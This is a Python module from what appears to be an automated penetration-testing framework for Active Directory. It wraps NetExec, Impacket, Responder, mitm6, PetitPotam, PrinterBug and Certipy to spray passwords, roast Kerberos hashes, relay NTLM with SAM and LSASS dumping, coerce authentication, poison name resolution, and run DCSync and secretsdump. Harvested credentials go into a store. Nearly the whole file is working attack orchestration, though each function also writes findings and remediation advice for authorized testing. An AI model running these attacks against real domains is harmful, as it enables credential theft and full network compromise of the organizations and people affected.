"""
Active Directory Penetration Testing Tools
Comprehensive AD attack toolkit optimized for one-day engagements
Focus: NTLM relay, credential harvesting, privilege escalation
"""
import asyncio
import json
import os
import re
import subprocess
from pathlib import Path
from typing import Dict, List, Optional, Tuple
from datetime import datetime
from utils.parser import (
parse_netexec_output,
parse_impacket_hashes,
parse_bloodhound_json,
parse_certipy_output
)
from utils.logger import get_logger
from utils.credentials import store_credential, get_credentials
from utils.state import Finding, Credential
logger = get_logger("ad_tools")
async def user_enum(
target: str,
domain: str,
username: Optional[str] = None,
password: Optional[str] = None
) -> dict:
"""
Enumerate domain users using NetExec
Returns: Dictionary with user list, descriptions, and metadata
"""
logger.info(f"Enumerating users on {target} for domain {domain}")
try:
cmd = ["netexec", "smb", target, "--users"]
if username and password:
cmd.extend(["-u", username, "-p", password, "-d", domain])
else:
cmd.extend(["-u", "", "-p", ""])
result = await run_command(cmd, timeout=120)
if result["return_code"] != 0:
return {
"success": False,
"error": "User enumeration failed. Target may require authentication or SMB may be disabled.",
"raw_output": result["stderr"]
}
users = parse_netexec_output(result["stdout"], output_type="users")
findings = []
if users:
findings.append(Finding(
severity="INFO",
title=f"Discovered {len(users)} domain users",
description=f"Enumerated {len(users)} user accounts from {domain}",
affected_hosts=[target],
evidence={"users": users[:10]} # Store first 10 for evidence
))
return {
"success": True,
"summary": f"Found {len(users)} domain users",
"users": users,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"User enumeration failed: {e}")
return {
"success": False,
"error": str(e)
}
async def smb_signing_check(
targets: str,
output_file: str = "/tmp/relay_targets.txt"
) -> dict:
"""
Check SMB signing status to identify relay targets
CRITICAL for NTLM relay attack planning
Returns: List of hosts vulnerable to relay attacks
"""
logger.info(f"Checking SMB signing on {targets}")
try:
cmd = [
"netexec", "smb", targets,
"--gen-relay-list", output_file
]
result = await run_command(cmd, timeout=300)
relay_targets = []
signing_enabled = []
for line in result["stdout"].split("\n"):
if "signing:False" in line:
match = re.search(r"(\d+\.\d+\.\d+\.\d+)", line)
if match:
relay_targets.append(match.group(1))
elif "signing:True" in line:
match = re.search(r"(\d+\.\d+\.\d+\.\d+)", line)
if match:
signing_enabled.append(match.group(1))
if os.path.exists(output_file):
with open(output_file, 'r') as f:
file_targets = [line.strip() for line in f if line.strip()]
relay_targets = list(set(relay_targets + file_targets))
findings = []
if relay_targets:
findings.append(Finding(
severity="HIGH",
title=f"SMB Signing Disabled on {len(relay_targets)} hosts",
description=(
"SMB signing is not enforced, allowing NTLM relay attacks. "
"An attacker can relay captured credentials to these hosts."
),
affected_hosts=relay_targets,
recommendation=(
"Enable SMB signing enforcement on all hosts via Group Policy. "
"Set 'Microsoft network server: Digitally sign communications (always)' to Enabled."
)
))
return {
"success": True,
"summary": f"Found {len(relay_targets)} relay targets, {len(signing_enabled)} with signing enabled",
"relay_targets": relay_targets,
"signing_enabled": signing_enabled,
"targets": relay_targets, # For tool output formatting
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"SMB signing check failed: {e}")
return {
"success": False,
"error": str(e)
}
async def shares_enum(
target: str,
username: str,
password: str,
domain: Optional[str] = None
) -> dict:
"""
Enumerate SMB shares and permissions
"""
logger.info(f"Enumerating shares on {target}")
try:
cmd = ["netexec", "smb", target, "--shares"]
cmd.extend(["-u", username, "-p", password])
if domain:
cmd.extend(["-d", domain])
result = await run_command(cmd, timeout=120)
shares = parse_netexec_output(result["stdout"], output_type="shares")
sensitive_shares = []
for share in shares:
share_name = share.get("name", "").upper()
permissions = share.get("permissions", "")
if any(keyword in share_name for keyword in ["ADMIN$", "C$", "SYSVOL", "NETLOGON"]):
if "WRITE" in permissions:
sensitive_shares.append(share)
findings = []
if sensitive_shares:
findings.append(Finding(
severity="HIGH",
title=f"Writable administrative shares on {target}",
description=f"User {username} has write access to {len(sensitive_shares)} administrative shares",
affected_hosts=[target],
evidence={"shares": sensitive_shares}
))
return {
"success": True,
"summary": f"Found {len(shares)} shares ({len(sensitive_shares)} sensitive)",
"shares": shares,
"sensitive_shares": sensitive_shares,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"Share enumeration failed: {e}")
return {
"success": False,
"error": str(e)
}
async def password_spray(
target: str,
domain: str,
userfile: str,
password: str,
delay: int = 1
) -> dict:
"""
Password spraying attack against domain accounts
Use with EXTREME caution to avoid account lockouts
"""
logger.warning(f"Starting password spray against {target} (delay={delay}s)")
try:
if not os.path.exists(userfile):
return {
"success": False,
"error": f"User file not found: {userfile}"
}
cmd = [
"netexec", "smb", target,
"-u", userfile,
"-p", password,
"-d", domain,
"--continue-on-success"
]
result = await run_command(cmd, timeout=600)
valid_creds = []
for line in result["stdout"].split("\n"):
if "[+]" in line and "\\"+domain in line:
match = re.search(r"([A-Za-z0-9_.-]+)\\([A-Za-z0-9_.-]+):", line)
if match:
domain_name, username = match.groups()
valid_creds.append({
"domain": domain_name,
"username": username,
"password": password,
"type": "password"
})
store_credential(Credential(
username=f"{domain_name}\\{username}",
secret=password,
credential_type="password",
source="password_spray"
))
findings = []
if valid_creds:
findings.append(Finding(
severity="CRITICAL",
title=f"Valid credentials discovered via password spray",
description=f"Found {len(valid_creds)} accounts using password '{password}'",
affected_hosts=[target],
recommendation="Implement stronger password policies and MFA. Review compromised accounts.",
evidence={"credentials": valid_creds}
))
return {
"success": True,
"summary": f"Password spray completed: {len(valid_creds)} valid credentials found",
"credentials": valid_creds,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"Password spray failed: {e}")
return {
"success": False,
"error": str(e)
}
async def asreproast(
target: str,
domain: str,
userfile: Optional[str] = None,
format: str = "hashcat"
) -> dict:
"""
AS-REP Roasting attack to harvest Kerberos hashes
Works against accounts with pre-authentication disabled
"""
logger.info(f"Starting AS-REP roasting against {target}")
try:
cmd = ["impacket-GetNPUsers", f"{domain}/", "-dc-ip", target, "-format", format]
if userfile:
cmd.extend(["-usersfile", userfile])
else:
cmd.append("-no-pass")
result = await run_command(cmd, timeout=300)
hashes = parse_impacket_hashes(result["stdout"], hash_type="asrep")
credentials = []
for hash_entry in hashes:
credentials.append({
"username": hash_entry["username"],
"hash": hash_entry["hash"],
"type": "asrep_hash",
"format": format
})
store_credential(Credential(
username=hash_entry["username"],
secret=hash_entry["hash"],
credential_type="asrep_hash",
source="asreproast"
))
findings = []
if credentials:
findings.append(Finding(
severity="HIGH",
title=f"AS-REP roastable accounts discovered",
description=(
f"Found {len(credentials)} accounts with Kerberos pre-authentication disabled. "
"Hashes can be cracked offline."
),
affected_hosts=[target],
recommendation=(
"Enable Kerberos pre-authentication on all accounts. "
"Review accounts with 'DONT_REQ_PREAUTH' flag set."
),
evidence={"usernames": [c["username"] for c in credentials]}
))
return {
"success": True,
"summary": f"AS-REP roasting completed: {len(credentials)} hashes captured",
"credentials": credentials,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"AS-REP roasting failed: {e}")
return {
"success": False,
"error": str(e)
}
async def kerberoast(
target: str,
domain: str,
username: str,
password: str,
format: str = "hashcat"
) -> dict:
"""
Kerberoasting attack to extract service account hashes
"""
logger.info(f"Starting Kerberoasting against {target}")
try:
cmd = [
"impacket-GetUserSPNs",
f"{domain}/{username}:{password}",
"-dc-ip", target,
"-request",
"-format", format
]
result = await run_command(cmd, timeout=300)
hashes = parse_impacket_hashes(result["stdout"], hash_type="tgs")
credentials = []
for hash_entry in hashes:
credentials.append({
"username": hash_entry["username"],
"hash": hash_entry["hash"],
"spn": hash_entry.get("spn"),
"type": "tgs_hash",
"format": format
})
store_credential(Credential(
username=hash_entry["username"],
secret=hash_entry["hash"],
credential_type="tgs_hash",
source="kerberoast",
metadata={"spn": hash_entry.get("spn")}
))
findings = []
if credentials:
findings.append(Finding(
severity="HIGH",
title=f"Kerberoastable service accounts found",
description=(
f"Extracted {len(credentials)} TGS hashes from service accounts. "
"These can be cracked offline to recover plaintext passwords."
),
affected_hosts=[target],
recommendation=(
"Use managed service accounts (gMSA) with complex passwords. "
"Ensure service accounts have 25+ character passwords."
),
evidence={"accounts": [c["username"] for c in credentials]}
))
return {
"success": True,
"summary": f"Kerberoasting completed: {len(credentials)} TGS hashes extracted",
"credentials": credentials,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"Kerberoasting failed: {e}")
return {
"success": False,
"error": str(e)
}
async def relay_setup(
targets: str,
smb2support: bool = True,
escalate_user: Optional[str] = None,
dump_sam: bool = True,
dump_lsass: bool = True,
interface: str = "eth0"
) -> dict:
"""
Setup NTLM relay attack infrastructure
This is the foundation for your one-day engagement workflow
"""
logger.info(f"Setting up NTLM relay to {targets}")
try:
if targets == "auto":
targets = "/tmp/relay_targets.txt"
if not os.path.exists(targets) and not is_ip_or_hostname(targets):
return {
"success": False,
"error": f"Target file not found: {targets}. Run ad_smb_signing_check first."
}
cmd = ["impacket-ntlmrelayx"]
if os.path.exists(targets):
cmd.extend(["-tf", targets])
else:
cmd.extend(["-t", targets])
if smb2support:
cmd.append("-smb2support")
if dump_sam:
cmd.append("--dump-sam")
if dump_lsass:
cmd.append("--dump-lsass")
if escalate_user:
cmd.extend(["--escalate-user", escalate_user])
cmd.extend(["-i", interface])
log_file = f"/tmp/ntlmrelayx_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log"
logger.info(f"Starting ntlmrelayx (log: {log_file})")
logger.info(f"Command: {' '.join(cmd)}")
process = subprocess.Popen(
cmd,
stdout=open(log_file, 'w'),
stderr=subprocess.STDOUT,
preexec_fn=os.setpgrp # Don't forward signals
)
await asyncio.sleep(3)
if process.poll() is not None:
with open(log_file, 'r') as f:
error_output = f.read()
return {
"success": False,
"error": f"ntlmrelayx failed to start. Check {log_file}",
"raw_output": error_output
}
return {
"success": True,
"summary": f"NTLM relay listener started (PID: {process.pid})",
"pid": process.pid,
"log_file": log_file,
"targets": targets,
"interface": interface,
"raw_output": f"Relay listener active on {interface}\nTargets: {targets}\nLog: {log_file}\n\n⚠️ Now run coercion attacks (petitpotam/printerbug) to force authentication!"
}
except Exception as e:
logger.error(f"Relay setup failed: {e}")
return {
"success": False,
"error": str(e)
}
async def coerce_petitpotam(
target: str,
listener: str,
pipe: str = "lsarpc",
username: Optional[str] = None,
password: Optional[str] = None
) -> dict:
"""
Coerce authentication using PetitPotam (MS-EFSRPC)
Extremely effective for triggering NTLM relay
"""
logger.info(f"Coercing {target} to authenticate to {listener} via PetitPotam")
try:
cmd = [
"python3", "/opt/PetitPotam/PetitPotam.py",
"-pipe", pipe,
listener,
target
]
if username and password:
if "\\" in username:
domain, user = username.split("\\", 1)
cmd.extend(["-d", domain, "-u", user, "-p", password])
else:
cmd.extend(["-u", username, "-p", password])
result = await run_command(cmd, timeout=60)
success = "Got response" in result["stdout"] or "Coerced" in result["stdout"]
if success:
findings = [Finding(
severity="CRITICAL",
title=f"Successful authentication coercion via PetitPotam",
description=f"Forced {target} to authenticate to {listener}",
affected_hosts=[target],
recommendation="Apply MS-EFSRPC patches and disable unnecessary RPC services"
)]
else:
findings = []
return {
"success": success,
"summary": "Authentication coercion triggered" if success else "Coercion may have failed",
"target": target,
"listener": listener,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"PetitPotam failed: {e}")
return {
"success": False,
"error": str(e)
}
async def coerce_printerbug(
target: str,
listener: str,
username: str,
password: str,
domain: str
) -> dict:
"""
Coerce authentication using PrinterBug (MS-RPRN)
Works on most Windows versions
"""
logger.info(f"Coercing {target} to authenticate to {listener} via PrinterBug")
try:
cmd = [
"python3", "/opt/printerbug/printerbug.py",
f"{domain}/{username}:{password}@{target}",
listener
]
result = await run_command(cmd, timeout=60)
success = "success" in result["stdout"].lower() or not result["stderr"]
if success:
findings = [Finding(
severity="CRITICAL",
title=f"Successful authentication coercion via PrinterBug",
description=f"Forced {target} to authenticate to {listener} using printer spooler",
affected_hosts=[target],
recommendation="Disable Print Spooler service on domain controllers and servers that don't need printing"
)]
else:
findings = []
return {
"success": success,
"summary": "PrinterBug coercion triggered" if success else "Coercion may have failed",
"target": target,
"listener": listener,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"PrinterBug failed: {e}")
return {
"success": False,
"error": str(e)
}
async def responder_poison(
interface: str,
analyze: bool = False,
wpad: bool = True,
force_wpad_auth: bool = False,
disable_smb: bool = False,
disable_http: bool = False
) -> dict:
"""
Start Responder to poison LLMNR/NBT-NS/mDNS
Can capture hashes or relay them
"""
logger.warning(f"Starting Responder on {interface} (analyze={analyze})")
try:
cmd = ["python3", "/opt/Responder/Responder.py", "-I", interface]
if analyze:
cmd.append("-A")
if wpad:
cmd.append("-w")
if force_wpad_auth:
cmd.append("-F")
if disable_smb:
cmd.append("-d") # Disable SMB server (for relay)
if disable_http:
cmd.append("-D") # Disable HTTP server (for relay)
log_file = f"/tmp/responder_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log"
process = subprocess.Popen(
cmd,
stdout=open(log_file, 'w'),
stderr=subprocess.STDOUT,
preexec_fn=os.setpgrp
)
await asyncio.sleep(2)
if process.poll() is not None:
with open(log_file, 'r') as f:
error_output = f.read()
return {
"success": False,
"error": f"Responder failed to start: {error_output}"
}
mode = "Analysis mode" if analyze else "Active poisoning mode"
return {
"success": True,
"summary": f"Responder started on {interface} ({mode})",
"pid": process.pid,
"log_file": log_file,
"interface": interface,
"mode": mode,
"raw_output": f"Responder active on {interface}\nLog: {log_file}\nMode: {mode}\n\n⚠️ Monitor log for captured hashes"
}
except Exception as e:
logger.error(f"Responder failed: {e}")
return {
"success": False,
"error": str(e)
}
async def mitm6_attack(
domain: str,
interface: str = "eth0",
relay_target: Optional[str] = None,
ignore_nofqdn: bool = False
) -> dict:
"""
Launch mitm6 DHCPv6 spoofing + WPAD attack
VERY DISRUPTIVE - use with caution
"""
logger.warning(f"Starting mitm6 attack against {domain}")
try:
cmd = ["mitm6", "-d", domain, "-i", interface]
if relay_target:
cmd.extend(["-hw", relay_target])
if ignore_nofqdn:
cmd.append("--ignore-nofqdn")
log_file = f"/tmp/mitm6_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log"
process = subprocess.Popen(
cmd,
stdout=open(log_file, 'w'),
stderr=subprocess.STDOUT,
preexec_fn=os.setpgrp
)
await asyncio.sleep(2)
if process.poll() is not None:
with open(log_file, 'r') as f:
error_output = f.read()
return {
"success": False,
"error": f"mitm6 failed to start: {error_output}"
}
return {
"success": True,
"summary": f"mitm6 DHCPv6 attack active against {domain}",
"pid": process.pid,
"log_file": log_file,
"domain": domain,
"interface": interface,
"raw_output": f"⚠️ MITM6 ACTIVE - HIGHLY DISRUPTIVE\nDomain: {domain}\nInterface: {interface}\nLog: {log_file}\n\nThis attack will disrupt network traffic. Use with caution!"
}
except Exception as e:
logger.error(f"mitm6 failed: {e}")
return {
"success": False,
"error": str(e)
}
async def bloodhound_collect(
target: str,
domain: str,
username: str,
password: str,
collection_method: str = "All",
dns_server: Optional[str] = None
) -> dict:
"""
Collect BloodHound data for attack path analysis
"""
logger.info(f"Collecting BloodHound data from {domain}")
try:
output_dir = f"/tmp/bloodhound_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
os.makedirs(output_dir, exist_ok=True)
cmd = [
"bloodhound-python",
"-u", username,
"-p", password,
"-d", domain,
"-dc", target,
"-c", collection_method,
"--zip"
]
if dns_server:
cmd.extend(["-ns", dns_server])
result = await run_command(cmd, timeout=600, cwd=output_dir)
zip_files = list(Path(output_dir).glob("*.zip"))
if not zip_files:
return {
"success": False,
"error": "BloodHound collection produced no output files",
"raw_output": result["stdout"]
}
return {
"success": True,
"summary": f"BloodHound data collected successfully",
"output_dir": output_dir,
"zip_file": str(zip_files[0]),
"collection_method": collection_method,
"raw_output": result["stdout"] + f"\n\n✅ Data saved to: {zip_files[0]}"
}
except Exception as e:
logger.error(f"BloodHound collection failed: {e}")
return {
"success": False,
"error": str(e)
}
async def secrets_dump(
target: str,
username: str,
password: str,
domain: Optional[str] = None,
use_hash: bool = False,
just_dc: bool = False
) -> dict:
"""
Dump secrets (SAM/SYSTEM/NTDS) from target
"""
logger.info(f"Dumping secrets from {target}")
try:
if domain:
user_string = f"{domain}/{username}"
else:
user_string = username
if use_hash:
user_string += f"@{target} -hashes :{password}"
else:
user_string += f":{password}@{target}"
cmd = ["impacket-secretsdump", user_string]
if just_dc:
cmd.append("-just-dc")
result = await run_command(cmd, timeout=600)
hashes = parse_impacket_hashes(result["stdout"], hash_type="ntlm")
credentials = []
for hash_entry in hashes:
credentials.append({
"username": hash_entry["username"],
"ntlm_hash": hash_entry["hash"],
"type": "ntlm_hash"
})
store_credential(Credential(
username=hash_entry["username"],
secret=hash_entry["hash"],
credential_type="ntlm_hash",
source="secretsdump"
))
findings = []
if credentials:
findings.append(Finding(
severity="CRITICAL",
title=f"Domain credentials dumped from {target}",
description=f"Extracted {len(credentials)} NTLM hashes including domain accounts",
affected_hosts=[target],
recommendation="Rotate all domain passwords immediately. Review privileged account access.",
evidence={"hash_count": len(credentials)}
))
return {
"success": True,
"summary": f"Dumped {len(credentials)} credentials from {target}",
"credentials": credentials,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"Secrets dump failed: {e}")
return {
"success": False,
"error": str(e)
}
async def dcsync(
target: str,
domain: str,
username: str,
password: str,
target_user: Optional[str] = None,
use_hash: bool = False
) -> dict:
"""
Perform DCSync attack
"""
logger.info(f"Performing DCSync on {target}")
try:
user_string = f"{domain}/{username}"
if use_hash:
user_string += f"@{target} -hashes :{password}"
else:
user_string += f":{password}@{target}"
cmd = ["impacket-secretsdump", user_string, "-just-dc"]
if target_user:
cmd.extend(["-just-dc-user", target_user])
result = await run_command(cmd, timeout=600)
hashes = parse_impacket_hashes(result["stdout"], hash_type="ntlm")
credentials = []
for hash_entry in hashes:
credentials.append({
"username": hash_entry["username"],
"ntlm_hash": hash_entry["hash"],
"type": "ntlm_hash"
})
store_credential(Credential(
username=hash_entry["username"],
secret=hash_entry["hash"],
credential_type="ntlm_hash",
source="dcsync"
))
findings = [Finding(
severity="CRITICAL",
title=f"DCSync attack successful",
description=f"Replicated {len(credentials)} password hashes from domain controller",
affected_hosts=[target],
recommendation="Review and restrict accounts with DCSync permissions (Replicating Directory Changes)"
)]
return {
"success": True,
"summary": f"DCSync completed: {len(credentials)} hashes extracted",
"credentials": credentials,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"DCSync failed: {e}")
return {
"success": False,
"error": str(e)
}
async def certipy_enum(
target: str,
domain: str,
username: str,
password: str,
vulnerable: bool = False
) -> dict:
"""
Enumerate ADCS for vulnerabilities
"""
logger.info(f"Enumerating ADCS on {domain}")
try:
cmd = [
"certipy", "find",
"-u", f"{username}@{domain}",
"-p", password,
"-dc-ip", target
]
if vulnerable:
cmd.append("-vulnerable")
output_dir = f"/tmp/certipy_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
os.makedirs(output_dir, exist_ok=True)
cmd.extend(["-output", f"{output_dir}/certipy"])
result = await run_command(cmd, timeout=300, cwd=output_dir)
vulns = parse_certipy_output(result["stdout"])
findings = []
for vuln in vulns:
findings.append(Finding(
severity="HIGH",
title=f"ADCS vulnerability: {vuln['type']}",
description=vuln['description'],
affected_hosts=[target],
recommendation=vuln.get('recommendation', 'Review and remediate ADCS template misconfigurations')
))
return {
"success": True,
"summary": f"Found {len(vulns)} ADCS vulnerabilities" if vulns else "ADCS enumeration completed",
"vulnerabilities": vulns,
"output_dir": output_dir,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"Certipy enumeration failed: {e}")
return {
"success": False,
"error": str(e)
}
async def certipy_esc8(
ca_server: str,
template: str = "Machine",
interface: str = "eth0"
) -> dict:
"""
Exploit ESC8 - NTLM relay to ADCS HTTP
"""
logger.info(f"Starting ESC8 exploitation against {ca_server}")
try:
log_file = f"/tmp/certipy_esc8_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log"
cmd = [
"certipy", "relay",
"-ca", ca_server,
"-template", template
]
process = subprocess.Popen(
cmd,
stdout=open(log_file, 'w'),
stderr=subprocess.STDOUT,
preexec_fn=os.setpgrp
)
await asyncio.sleep(2)
if process.poll() is not None:
with open(log_file, 'r') as f:
error = f.read()
return {
"success": False,
"error": f"Certipy relay failed to start: {error}"
}
return {
"success": True,
"summary": f"ESC8 relay active against {ca_server}",
"pid": process.pid,
"log_file": log_file,
"ca_server": ca_server,
"template": template,
"raw_output": f"ESC8 relay listener active\nCA: {ca_server}\nTemplate: {template}\nLog: {log_file}\n\n⚠️ Trigger authentication coercion to obtain certificate"
}
except Exception as e:
logger.error(f"ESC8 exploitation failed: {e}")
return {
"success": False,
"error": str(e)
}
async def certipy_request(
ca_server: str,
domain: str,
username: str,
password: str,
template: str,
upn: Optional[str] = None,
dns: Optional[str] = None
) -> dict:
"""
Request certificate from ADCS
"""
logger.info(f"Requesting certificate from {ca_server}")
try:
cmd = [
"certipy", "req",
"-u", f"{username}@{domain}",
"-p", password,
"-ca", ca_server,
"-template", template
]
if upn:
cmd.extend(["-upn", upn])
if dns:
cmd.extend(["-dns", dns])
output_dir = f"/tmp/certipy_req_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
os.makedirs(output_dir, exist_ok=True)
result = await run_command(cmd, timeout=120, cwd=output_dir)
cert_files = list(Path(output_dir).glob("*.pfx"))
success = bool(cert_files)
if success:
findings = [Finding(
severity="CRITICAL",
title=f"Certificate obtained from ADCS",
description=f"Successfully requested certificate using template '{template}'",
affected_hosts=[ca_server],
recommendation="Review certificate template permissions and enrollment rights"
)]
else:
findings = []
return {
"success": success,
"summary": f"Certificate request {'successful' if success else 'failed'}",
"certificate": str(cert_files[0]) if cert_files else None,
"output_dir": output_dir,
"findings": findings,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"Certificate request failed: {e}")
return {
"success": False,
"error": str(e)
}
async def rbcd_attack(
target: str,
domain: str,
username: str,
password: str,
dc_ip: str,
impersonate: str = "Administrator"
) -> dict:
"""
Perform RBCD attack
"""
logger.info(f"Performing RBCD attack on {target}")
try:
output_dir = f"/tmp/rbcd_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
os.makedirs(output_dir, exist_ok=True)
return {
"success": False,
"error": "RBCD attack is complex multi-step process. Implement full workflow or use manual steps.",
"raw_output": "RBCD requires: 1) Add computer 2) Set delegation 3) Request ST 4) Use ticket"
}
except Exception as e:
logger.error(f"RBCD attack failed: {e}")
return {
"success": False,
"error": str(e)
}
async def ldap_dump(
target: str,
domain: str,
username: str,
password: str
) -> dict:
"""
Comprehensive LDAP dump
"""
logger.info(f"Dumping LDAP from {target}")
try:
output_dir = f"/tmp/ldap_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
os.makedirs(output_dir, exist_ok=True)
cmd = [
"ldapdomaindump",
"-u", f"{domain}\\{username}",
"-p", password,
target,
"-o", output_dir
]
result = await run_command(cmd, timeout=300)
output_files = list(Path(output_dir).glob("*"))
return {
"success": True,
"summary": f"LDAP dump completed: {len(output_files)} files generated",
"output_dir": output_dir,
"files": [str(f) for f in output_files],
"raw_output": result["stdout"] + f"\n\nOutput directory: {output_dir}"
}
except Exception as e:
logger.error(f"LDAP dump failed: {e}")
return {
"success": False,
"error": str(e)
}
async def check_credentials(
target: str,
domain: str,
username: str,
password: str
) -> dict:
"""
Quick credential validation
"""
logger.info(f"Validating credentials for {domain}\\{username}")
try:
cmd = [
"netexec", "smb", target,
"-u", username,
"-p", password,
"-d", domain
]
result = await run_command(cmd, timeout=30)
valid = "[+]" in result["stdout"] and "Pwn3d!" not in result["stdout"]
admin = "Pwn3d!" in result["stdout"]
status = "Admin access!" if admin else ("Valid credentials" if valid else "Invalid credentials")
return {
"success": valid or admin,
"summary": status,
"valid": valid,
"is_admin": admin,
"username": username,
"domain": domain,
"raw_output": result["stdout"]
}
except Exception as e:
logger.error(f"Credential check failed: {e}")
return {
"success": False,
"error": str(e)
}
async def parse_bloodhound(
data_dir: str,
analysis_type: str = "all"
) -> dict:
"""
Parse BloodHound data for quick wins
"""
logger.info(f"Parsing BloodHound data from {data_dir}")
try:
if not os.path.exists(data_dir):
return {
"success": False,
"error": f"Directory not found: {data_dir}"
}
json_files = list(Path(data_dir).glob("*.json"))
if not json_files:
return {
"success": False,
"error": "No BloodHound JSON files found"
}
results = parse_bloodhound_json(json_files, analysis_type)
findings = []
if results.get("kerberoastable"):
findings.append(Finding(
severity="HIGH",
title=f"Found {len(results['kerberoastable'])} kerberoastable accounts",
description="Service accounts with SPNs that can be Kerberoasted",
evidence={"accounts": results["kerberoastable"][:5]}
))
if results.get("asreproastable"):
findings.append(Finding(
severity="HIGH",
title=f"Found {len(results['asreproastable'])} AS-REP roastable accounts",
description="Accounts without Kerberos pre-authentication",
evidence={"accounts": results["asreproastable"][:5]}
))
return {
"success": True,
"summary": f"Analyzed {len(json_files)} BloodHound files",
"results": results,
"findings": findings,
"raw_output": json.dumps(results, indent=2)
}
except Exception as e:
logger.error(f"BloodHound parsing failed: {e}")
return {
"success": False,
"error": str(e)
}
async def run_command(
cmd: List[str],
timeout: int = 120,
cwd: Optional[str] = None
) -> dict:
"""Execute command and return output"""
try:
process = await asyncio.create_subprocess_exec(
*cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
cwd=cwd
)
stdout, stderr = await asyncio.wait_for(
process.communicate(),
timeout=timeout
)
return {
"return_code": process.returncode,
"stdout": stdout.decode('utf-8', errors='ignore'),
"stderr": stderr.decode('utf-8', errors='ignore')
}
except asyncio.TimeoutError:
process.kill()
await process.wait()
return {
"return_code": -1,
"stdout": "",
"stderr": f"Command timed out after {timeout} seconds"
}
except Exception as e:
return {
"return_code": -1,
"stdout": "",
"stderr": str(e)
}
def is_ip_or_hostname(target: str) -> bool:
"""Check if target is IP address or hostname"""
import ipaddress
try:
ipaddress.ip_address(target)
return True
except ValueError:
return bool(re.match(r'^[a-zA-Z0-9][a-zA-Z0-9-\.]*[a-zA-Z0-9]$', target))